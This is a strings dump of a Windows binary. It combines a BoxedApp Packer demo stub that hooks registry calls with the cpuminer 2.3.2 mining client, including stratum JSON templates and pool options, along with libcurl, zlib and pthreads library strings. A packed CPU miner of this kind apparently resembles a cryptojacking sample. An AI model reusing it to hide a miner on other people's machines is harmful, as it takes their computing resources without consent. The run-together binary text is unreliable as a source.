find_first_connection_Curl_conncache_foreach_Curl_conncache_remove_conn_Curl_conncache_find_bundle_Curl_conncache_add_conn_Curl_conncache_destroy_Curl_conncache_init_print_pipeline_Curl_pipeline_set_server_blacklist_Curl_pipeline_server_blacklisted_Curl_pipeline_set_site_blacklist_Curl_pipeline_site_blacklisted_Curl_move_handle_from_send_to_recv_pipe_Curl_add_handle_to_pipeline_Curl_pipeline_penalized.weak.__Jv_RegisterClasses.___gcc_register_frame__libmsvcrt_a_iname_Curl_handler_http___crt_xl_start_____crt_xi_start_____crt_xi_end___Curl_crealloc_Curl_cfree_Curl_HMAC_MD5_Curl_wkday___crt_xp_start___Curl_handler_file___crt_xp_end____head_libmsvcrt_a_Curl_ccalloc___crt_xc_end_____crt_xc_start___Curl_DIGEST_MD5_Curl_cmalloc_Curl_month_Curl_cstrdup___crt_xt_start___Curl_cwcsdup___crt_xt_end___Curl_ack_eintr0`.data0@.bss%XQIb%dQIb%DQIb%xQIblibgcc_s_dw2-1.dll\QUSEREX.DLLpthread_key_createpthread_key_delete7(8.898?8_CRT_MT___w64_mingwthr_add_key_dtor___w64_mingwthr_remove_key_dtor__mingwthr_key_t__mingwthr_keyGNU C 4.5.2../mingw/dllcrt1.cC:\MinGW\msys\1.0\src\mingwrt-DllMainCRTStartup@12__report_error../mingw/crtst.c__mingwthr_run_key_dtorskeypnew_keyprev_keycur_keykey_dtor_listc:/mingw/bin/../lib/gcc/mingw32/4.5.2/includecrtst.ccygming-crtbegin.c.tls$AAA.tls$ZZZ.CRT$XLA.CRT$XLZ.CRT$XLC.CRT$XLD.CRT$XDA.CRT$XDZ.idata$6N.idata$6j.idata$62.idata$6V.idata$6~.idata$6*.idata$6f.idata$6@.idata$6>cygming-crtend.c__CRT_MT.eh_frame.debug_pubtypes.debug_str.debug_ranges_pthread_key_create_pthread_key_delete_ptw32_processTerminate.part.1_pthread_join___report_error___mingwthr_run_key_dtors_key_dtor_list____w64_mingwthr_add_key_dtor____w64_mingwthr_remove_key_dtor.text.startup.ctors.65535.weak.___register_frame_info.___gcc_register_frame_ptw32_selfThreadKey_ptw32_cleanupKey.weak.___deregister_frame_info.___gcc_register_framedeflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adlerbinflate 1.2.8 Copyright 1995-2013 Mark Adler%9X9i9z9"@"@"@"@This EXE is created by the demo version of BoxedApp PackerVisit our web-site at: http://boxedapp.com/boxedapppacker/order.htmlWBoxedAppLog_%d.txtBoxedAppVar:ExeFileNameBoxedAppVar:ExeFileExtensionBoxedAppVar:ExeFileNameWithoutExtensionBoxedAppVar:ExeFullPathBoxedAppVar:OldCmdLineHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_CURRENT_CONFIGHKEY_USERS%s\%s%s\winsxs\tempBxDir\virtualAsm:\tempManifest.manifest%s_%.8x_%.8x_%.8x\KernelBase.dll\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll%d-%d-%p:\TLSSupport310D39B571B74d36B95451DD240D8758",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper\rundll32.exe"DotNetAppDomainManager.CManagedHostBoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1DotNetAppDomainManager.CAppDomainManager.config.manifest",BoxedAppSDK_AttachMixedBitnessProcessHelperAttempt to launch not executable file:Unable to find appropriate template execomdlg32.dll\dllhost.exehh.exefind.exehelp.exewinver.exeregsvr32.exedllhost.exentvdm.exetcpsvcs.exempr.dllWadvapi32.dllsxs.dllObtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html%s_%.8x_%.8x%s_%.8xboxedapp_msg_processboxedapp_event_newmsgboxedapp_msg_globalbxsdk64.dll:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\\DosDevices\pipe\\Device\NamedPipe\\??\pipe\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificatespublicKeyTokenSoftware\Microsoft\Windows\CurrentVersion\SideBySide\Winners\!"#$%&'()* ,-./0123456789:;<=>?@3, 3, 5, 0BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.BoxedAppSDK.dll\libcurl-4.dll !"#$%&'()* ,-./0123456789:pthreadgc2.dll\pthreadgc2.dll POSIX Threads for Windows LPGL2, 9, 1, 0pthreadGC2.DLLhttp://sourceware.org/pthreads-win32/\zlib1.dll For more information visit http://www.zlib.net/cvtres.exe_3500_rwx_00400000_00177000:
.text``.data.rdata`@.bss.idata.main.bxpck66665\\\\\\\\5\\\\666656666libgcj-12.dllJSON decode of %s failedhttp://https://stratum tcp://http://%scpuminer 2.3.2accepted: %lu/%lu (%.2f%%), %s khash/s %sDEBUG: reject reason: %sDEBUG: job_id='%s' extranonce2=%s ntime=xStarting Stratum on %s...terminating workio thread...retry after %d secondsJSON decode failed(%d): %s{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}{"method": "getwork", "params": [ "%s" ], "id":1}JSON key '%s' not foundJSON key '%s' is not a stringCURL initialization failed%s%s%sLong-polling activated for %sjson_rpc_call failed, retry after %d secondsDEBUG: got new work in %d msBinding thread %d to cpu %dthread %d: %lu hashes, %s khash/sTotal: %s khash/swork retrieval failed, exiting mining thread %dhttp://127.0.0.1:9332/%s: unsupported non-option argument '%s'JSON option %s invalidhttps:%s:%sthread %d create failed%d miner threads started, using '%s' algorithm.certuserpass-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)-O, --userpass=U:P username:password pair for mining server-p, --pass=PASSWORD password for mining server--cert=FILE certificate for mining server using SSL-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy--no-longpoll disable X-Long-Polling support--no-stratum disable X-Stratum support[%d-d-d d:d:d] %sUser-Agent: cpuminer/2.3.2HTTP request failed: %sJSON-RPC call failed: %shex2bin failed on '%s'DEBUG: %sHash: %sTarget: %shttp%shttp_proxyStratum connection failed: %s{"id": 1, "method": "mining.subscribe", "params": []}{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}mining.notifyStratum session id: %smining.set_difficultyclient.reconnectstratum tcp://%s:%dServer requested reconnection to %sclient.get_versioncpuminer/2.3.2client.show_messageMESSAGE FROM SERVER: %s{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}%s near '%s'%s near end of fileunable to decode byte 0x%x at position %dcontrol character 0x%xinvalid Unicode '\uX\uX'invalid Unicode '\uX'end == saved_text lex->saved_text.lengthunable to open %s: %s\ux\ux\uxmingwm10.dll__mingwthr_remove_key_dtor__mingwthr_key_dtorVirtualQuery failed for %d bytes at address %pUnknown pseudo relocation protocol version %d.Unknown pseudo relocation bit size %d.%s: option requires an argument -- %c%s: unrecognised option `-%s'%s: invalid option -- %coption `%s%s' doesn't accept an argumentoption `%s%s' requires an argument%s: option `%s' is ambiguous%s: unrecognised option `%s'01234567891399780752 312curl_easy_cleanupcurl_easy_initcurl_easy_performcurl_easy_resetcurl_easy_setoptcurl_global_initcurl_slist_appendcurl_slist_free_allcurl_versionpthread_joinlibcurl-4.dllKERNEL32.dllmsvcrt.dllpthreadGC2.dllWS2_32.dllzcÁKERNEL32.DLLUSER32.DLLEnumChildWindowskernel32.dllntdll.dllmscoree.dll.mixcrtPlease contact the application's support team for more information.- Attempt to initialize the CRT more than once.- CRT not initialized- floating point support not loadedGetProcessWindowStationoperatorUSER32.dllSHELL32.dllOLEAUT32.dllGetProcessHeapGetCPInfoGetConsoleOutputCPEXEPackerHost32.exe?m_IID@@3RCU_IMAGE_IMPORT_DESCRIPTOR@@C`.rdata@.data.rsrc@.reloc.\BoxedAppSDK_StaticLib.cppBoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelperBoxedAppSDK_AttachMixedBitnessProcessHelperBoxedAppSDK_EnumVirtualRegKeysABoxedAppSDK_EnumVirtualRegKeysWBoxedAppSDK_ExecuteDotNetApplicationABoxedAppSDK_ExecuteDotNetApplicationWBoxedAppSDK_DeleteVirtualRegKeyByHandleBoxedAppSDK_DeleteVirtualRegKeyWBoxedAppSDK_DeleteVirtualRegKeyABoxedAppSDK_CreateVirtualRegKeyWBoxedAppSDK_CreateVirtualRegKeyAC62E2B35-E4B3-4019-A7C4-F50AC7F78470Get exe dir...Get exe dir...doneGet the extension...doneGet current dir...doneGet old args...doneThe command line overriding: %sGetCommandLineW preparing to intercept...doneGetCommandLineA preparing to intercept...doneThe embedding BoxedApp into child processes: %sGetWindowsDirectoryWRegCreateKeyExWRegDeleteKeyWRegCloseKeyADVAPI32.dllole32.dllEXEPackerStub32.dlld:\build_area\boxedapp_src\src\boxedappsolution\exepackerstub\!output\exepackerstub32\release_full\EXEPackerStub32.pdbl$D9.tOFTPSWu$D TryCreateProcessForVirtualEXE, template exe found:CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0xCBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0xCBoxedAppCore::My_NtFlushKey, KeyHandle = 0xCBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0xCBoxedAppCore::My_NtQueryKey, KeyHandle =CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0xKernelBase.dll0x%x%xCBoxedAppCore::My_NtCreateKey, ObjectAttributes = 'CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0xCBoxedAppCore::My_NtLoadKey, DestinationKeyName = 'CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0xCBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = 'CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0xCBoxedAppCore::My_NtUnloadKey, DestinationKeyName = 'CBoxedAppCore::My_NtRenameKey, KeyHandle =BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart: Can't create process of rundll32.exe, last error ={4F95F74C-9713-4181-ACDD-8A50195FBC0F}BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelperBoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelperCBoxedAppCore::My_NtLoadKey2, DestinationKeyName = 'CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0xCBoxedAppCore::My_NtSaveKey, KeyHandle = 0x:\VirtualDllWithSameImport.dll:\VirtualDllWithTls.dllVirtualDllWithTls.dllVirtualDllWithSameImport.dllWinExecadvapi32.dllNtRenameKeyNtUnloadKeyNtSetValueKeyNtSetInformationKeyNtSaveKeyNtRestoreKeyNtReplaceKeyNtQueryValueKeyNtQueryMultipleValueKeyNtQueryKeyNtOpenKeyExNtOpenKeyNtNotifyChangeKeyNtLoadKey2NtLoadKeyNtFlushKeyNtEnumerateValueKeyNtEnumerateKeyNtDeleteValueKeyNtDeleteKeyNtCreateKey[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]FILE_EXECUTEGENERIC_EXECUTEKEY_WOW64_64KEYKEY_WOW64_32KEYKEY_NOTIFYKEY_CREATE_LINKKEY_ENUMERATE_SUB_KEYSKEY_CREATE_SUB_KEYKEY_SET_VALUEKEY_QUERY_VALUESECTION_MAP_EXECUTEPAGE_EXECUTE_WRITECOPYPAGE_EXECUTE_READWRITEPAGE_EXECUTE_READPAGE_EXECUTESTATUS_PRIMARY_TRANSPORT_CONNECT_FAILEDSTATUS_LOCAL_USER_SESSION_KEYSTATUS_NULL_LM_PASSWORDSTATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXESTATUS_CARDBUS_NOT_SUPPORTEDSTATUS_INVALID_PORT_ATTRIBUTESSTATUS_PORT_MESSAGE_TOO_LONGSTATUS_PORT_DISCONNECTEDSTATUS_PORT_CONNECTION_REFUSEDSTATUS_INVALID_PORT_HANDLESTATUS_PORT_ALREADY_SETSTATUS_EAS_NOT_SUPPORTEDSTATUS_CTL_FILE_NOT_SUPPORTEDSTATUS_WRONG_PASSWORDSTATUS_ILL_FORMED_PASSWORDSTATUS_PASSWORD_RESTRICTIONSTATUS_PASSWORD_EXPIREDSTATUS_FLOAT_DENORMAL_OPERANDSTATUS_FLOAT_INVALID_OPERATIONSTATUS_PIPE_NOT_AVAILABLESTATUS_INVALID_PIPE_STATESTATUS_PIPE_BUSYSTATUS_PIPE_DISCONNECTEDSTATUS_PIPE_CLOSINGSTATUS_PIPE_CONNECTEDSTATUS_PIPE_LISTENINGSTATUS_NOT_SUPPORTEDSTATUS_PIPE_EMPTYSTATUS_WRONG_PASSWORD_CORESTATUS_PIPE_BROKENSTATUS_DISK_OPERATION_FAILEDSTATUS_KEY_DELETEDSTATUS_KEY_HAS_CHILDRENSTATUS_NO_USER_SESSION_KEYSTATUS_PASSWORD_MUST_CHANGESTATUS_PORT_UNREACHABLESTATUS_LOGIN_TIME_RESTRICTIONSTATUS_LOGIN_WKSTA_RESTRICTIONSTATUS_UNSUPPORTED_COMPRESSIONSTATUS_NO_USER_KEYSSTATUS_NOT_EXPORT_FORMATSTATUS_TRANSPORT_FULLSTATUS_WMI_NOT_SUPPORTEDSTATUS_SAM_NEED_BOOTKEY_PASSWORDSTATUS_SAM_NEED_BOOTKEY_FLOPPYSTATUS_STRONG_CRYPTO_NOT_SUPPORTEDSTATUS_NOT_SUPPORTED_ON_SBSSTATUS_CSS_KEY_NOT_PRESENTSTATUS_CSS_KEY_NOT_ESTABLISHEDSTATUS_NO_KERB_KEYSTATUS_UNSUPPORTED_PREAUTHSTATUS_PORT_NOT_SETSTATUS_INVALID_IMPORT_OF_NON_DLLSTATUS_SMARTCARD_NO_KEY_CONTAINERSTATUS_SMARTCARD_NO_CERTIFICATESTATUS_SMARTCARD_NO_KEYSETSTATUS_SMARTCARD_CERT_REVOKEDSTATUS_SMARTCARD_CERT_EXPIREDSTATUS_SXS_KEY_NOT_FOUNDSTATUS_CLUSTER_JOIN_IN_PROGRESSSTATUS_CLUSTER_JOIN_NOT_IN_PROGRESSRegDeleteKeyExWNtRequestWaitReplyPortNtConnectPortNtReplyPortNtCompleteConnectPortNtAcceptConnectPortNtReplyWaitReceivePortNtCreateWaitablePortImported function,.dataIt's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULLIt's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStreamIt's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULLBoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeysNtEnumerateKey() returned unexpected error, status =, RegTree::IEnumKeyNode::GetNext() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys, RegTree::IKeyNode::EnumKeys() failed, hr =: RegTree::IEnumKeyNode::GetNext() failed, hr =: GetAllChildsKeys() failed, status =BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal: RegTree::IKeyNode::EnumKeys() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPatherror, IVirtualKeyHandle_GetFullPath() returnedInvalid key information class:KeySetHandleTagsInformation is not supported for virtual handleKeySetDebugInformation is not supported for virtual handleKeySetVirtualizationInformation is not supported for virtual handleKeyControlFlagsInformation is not supported for virtual handleKeyWow64FlagsInformation is not supported for virtual handleWe still don't process NtQueryObject / ObjectBasicInformation for virtual key handlesWe still don't process NtQueryObject / ObjectTypeInformation for virtual key handles: IVirtualKeyHandle::Rename() failed, hr =: RegTree::IKeyNode::Remove() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal: RegTree::IKeyNode::AddKey() failed, hr =: result hkey =: IVirtualKey::CreateKey() failed, hr =: we can't create a virtual key with its own behavior under another virtual key: Handles::CreateVirtualKeyHandle() failed, hr =: IVirtualKey::OpenKey() failed, hr =: RegImpl::CreateKeyOnSharedMem() failed, hr =: GetFullRegKeyPath() failed for the hKey =: Handles::IVirtualKeyHandle::CreateKey() failed and returned: passed pBehavior is not NULL, but parent key is virtual, so we can't create a keyBoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey: lpSubKey: "BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey: Handles::CreateVirtualKeyHandle() failedBoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal: SearchStartingFromRealKey() failed: RegTree::IKeyNode::FindValue() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal: IVirtualKeyHandle::put_Value() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime: NtQueryKey() failed, status =: NtOpenKey() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys: NtEnumerateValueKey() failed when we tried to get name of the node, status =: IKeyNode::EnumValues() failed, hr =: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternalBoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal: invalid KeyInformationClass passed:: IVirtualKeyHandle_GetFullPath() failed, hr =: Behavior::IEnumVirtualKey::GetNext() failed, hr =: IVirtualKeyHandle::EnumValues() failed, hr =: IVirtualKeyHandle::EnumKeys() failed, hr =: IVirtualKeyHandle::get_LastWriteTime() failed, hr =reg:NtQueryMultipleValueKey(: IKeyNode::FindValue() failed, hr =: IVirtualKeyHandle::get_Value() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal: IVirtualKeyHandle::get_ValueType() failed, hr =reg:NtSetInformationKey(RegTree::IKeyNode::RemoveValue() failed, hrBoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternalreg:NtRenameKey(RegTree::IEnumKeyNode::GetNext(), hr =RegTree::IKeyNode::EnumKeys(), hr =: IEnumVirtualKey::GetNext() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternalreg:NtDeleteValueKey(: NtEnumerateKey() failed when we tried to get name of the node, status =, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =, Behavior::IVirtualKey::OpenKey() failed, hr =: IKeyNode::EnumKeys() failed, hr =BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternalreg:NtEnumerateValueKey(reg:NtQueryKey(reg:NtQueryValueKey(reg:NtSetValueKey(reg:NtCreateKey(reg:NtDeleteKey(reg:NtEnumerateKey(reg:NtOpenKey(RegOpenKeyExWRegOpenKeyWbxsdk32.dlld:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb`.rsrcv2.0.50727BoxedAppSDK_AppDomainManager.dllSystem.Security.ctorSystem.Security.PolicySystem.ReflectionSystem.Runtime.InteropServicesSystem.DiagnosticsSystem.Runtime.CompilerServicesSystem.CollectionsSystem.Security.PermissionsSystem.IODllImportAttributeshell32.dlllpCmdLine1.0.0.0$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdbBoxedAppSDKThunk32.dlld:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb.relocTLSSupport32.dlld:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb9 9$9(9,9094!40484}4:$:,:5:::{:?#?2?9?@?1 1$1(1,10141819$=(=,=0=4=8=<=@=6 6$6(6,6064686<6@61"26233'44 40454:4:":2:7:>;,10141818 8$8(8,8P`.data.edata0@.idataSShPiSSh}ipurl/j.RPjlibgcj_s.dllCouldn't open file %sCan't open %s for writingCan't get the size of %sLast-Modified: %s, d %s M d:d:d GMT%c%c==%c%c%c=%c%c%c%c%s:%d%5[^:]:%d:%5sResolve %s found illegal!Added %s:%d:%s to DNS cachetimeout on name lookup is not supported%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s; filename="%s"%s; boundary=%sContent-Type: multipart/mixed, boundary=%sContent-Type: %scouldn't open file "%s"--%s--p.jpgp.jpegp.txtp.htmlp.xml#HttpOnly_23[^;=]=I99[^;httponlyskipped cookie with illegal dotcount domain: %sskipped cookie with bad tailmatch domain: %s%s cookie %s="%s" for domain %s, path %s, expire %lld# Netscape HTTP Cookie File# http://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.# Fatal libcurl errorWARNING: failed to save cookies in %sAvoided giant realloc for header (max is %d)!HTTP/The requested URL returned error: %d%s, d %s M d:d:d GMTIf-Modified-Since: %sIf-Unmodified-Since: %sLast-Modified: %s%sAuthorization: Basic %s%s auth using %s with user '%s'Referer: %sAccept-Encoding: %s%s, TEChunky upload is not supported by HTTP 1.0Host: %s%s%sHost: %s%s%s:%huftp://;type=%cRange: bytes=%sContent-Range: bytes %s%lld/%lldContent-Range: bytes %s/%lldftp://%s:%s@%s%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s%s=%sInternal HTTP POST error!Content-Type: application/x-www-form-urlencodedFailed sending HTTP POST requestFailed sending HTTP requestHTTP error before end of send, stop sendingHTTP/%d.%d =HTTP =RTSP/%d.%d =The requested URL returned error: %sHTTP 1.0, assume close after bodyHTTP/1.0 proxy connection set to keep alive!HTTP/1.1 proxy connection set close!HTTP/1.0 connection set to keep alive![%s %s %s]Recv failure: %sSend failure: %s/etc/ssl/certs/ca-certificates.crtIDN support not present, can't parse Unicode domainsConnected to %s (%s) port %ld (#%ld)%5[^:@]:%5[^@][%*45[0123456789abcdefABCDEF:.]%c%s://%s%s%s:%hu%s%s%sPort number too large: %luCouldn't resolve host '%s'Couldn't resolve proxy '%s'User-Agent: %sAbout to connect() to %s%s port %ld (#%ld)Curl_addHandleToPipeline: length: %dClosing connection %dConnection #%ld to host %s left intactFound bundle for host %s: %pServer doesn't support pipeliningConnection %d seems to be dead![^:]:%[^:]://%[^malformed :%5[^@]Protocol %s not supported or disabled in libcurl%s://%sCouldn't find host %s in the _netrc file; using defaultsftp@example.comFound connection %d, with requests in the pipe (%d)Re-using existing connection! (#%ld) with host %sCURLOPT_SSL_VERIFYHOST no longer supports 1 as value!Operation too slow. Less than %ld bytes/sec transferred the last %ld secondszlib/%s7.30.0%%Xloginpassword[^?&/:]://%cIssue another request to this URL: '%s'Violate RFC 2616/10.3.2 and switch from POST to GETViolate RFC 2616/10.3.3 and switch from POST to GETDisables POST, goes with %sNo URL set!seek callback returned error %dthe ioctl callback returned %dioctl callback returned error %doperation aborted by callbackRewinding stream by : %zd bytes on url %s (zero-length body)Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)HTTP server doesn't seem to support byte ranges. Cannot resume.Problem (%d) in the Chunked-Encoded dataRewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lldUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.Operation timed out after %ld milliseconds with %lld out of %lld bytes receivedOperation timed out after %ld milliseconds with %lld bytes receivedpUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.psa_addr inet_ntop() failed with errno %d: %sTrying %s...Could not set TCP_NODELAY: %sTCP_NODELAY setFailed to set SO_KEEPALIVE on fd %dFailed to set SIO_KEEPALIVE_VALS on fd %d: %dCouldn't bind to interface '%s'Local Interface %s is ip %s using address family %iName '%s' family %i resolved to '%s' family %iCouldn't bind to '%s'getsockname() failed with errno %d: %sLocal port: %huBind to local port %hu failed, trying nextbind failed with errno %d: %sFailed to connect to %s: %scouldn't connect to %s at %s:%dgetpeername() failed with errno %d: %sssrem inet_ntop() failed with errno %d: %sssloc inet_ntop() failed with errno %d: %sFailed connect to %s:%ld; %spInternal error clearing splay node = %dInternal error removing splay node = %dpPipe broke: handle 0x%p, url = %sIn state %d with no easy_conn, bail out!Error while processing content unencoding: %s1.2.81.2.0.4px%s:%s:%s%s:%.*s%s:%s:x:%s:%s:%s%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"%s, opaque="%s"%s, algorithm="%s"Unsupported protocolURL using bad/illegal format or missing URLA requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.FTP: weird server replyFTP: The server failed to connect to data portFTP: Accepting server connect has timed outFTP: The server did not accept the PRET command.FTP: unknown PASS replyFTP: unknown PASV replyFTP: unknown 227 response formatFTP: can't figure out the host in the PASV responseFTP: couldn't set file typeFTP: couldn't retrieve (RETR failed) the specified fileHTTP response code said errorFTP: command PORT failedFTP: command REST failedOperation was aborted by an application callbackA libcurl function was given a bad argumentAn unknown option was passed in to libcurlSSL peer certificate or SSH remote key was not OKProblem with the local SSL certificatePeer certificate cannot be authenticated with given CA certificatesProblem with the SSL CA cert (path? access rights?)Unrecognized or bad HTTP Content or Transfer-EncodingInvalid LDAP URLIssuer check against peer certificate failedLogin deniedTFTP: File Not FoundTFTP: Access ViolationTFTP: Illegal operationTFTP: Unknown transfer IDTFTP: No such userCaller must register CURLOPT_CONV_ callback optionsError in the SSH layerUnable to parse FTP file listPlease call curl_multi_perform() soonCURLSHcode unknownProtocol option is unsupportedProtocol is unsupportedSocket is unsupportedOperation not supportedAddress family not supportedProtocol family not supportedWinsock version not supportedUnknown error %d (%#x)Curl_ipv4_resolve_r failed for %s%d.%d.%d.%dd:d:dd:dUser was rejected by the SOCKS5 server (%d %d).SOCKS5 GSSAPI per-message authentication is not supported.No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)Failed to resolve "%s" for SOCKS5 connect.Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)Can't complete SOCKS5 connection to %s:%d. (%d)Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)Failed to resolve "%s" for SOCKS4 connect.SOCKS4%s request granted.Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.Establish HTTP proxy tunnel to %s:%hu%s:%hu%s%s%s:%huHost: %sCONNECT %s HTTP/%s%s%s%s%sHTTP/1.%d %dTUNNEL_STATE switched to: %dReceived HTTP code %d from proxy after CONNECT%s/%susername="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s0000000112345678%s xxxxxxxxxxxxxxxx- Conn %d (%p) send_pipe: %d, recv_pipe: %dServer %s is blacklistedServer %s is not blacklistedSite %s:%d is pipeline blacklistedAdding handle: send: %dAdding handle: recv: %dConn: %d (%p) Receive pipe weight: (%d/%d), penalized: 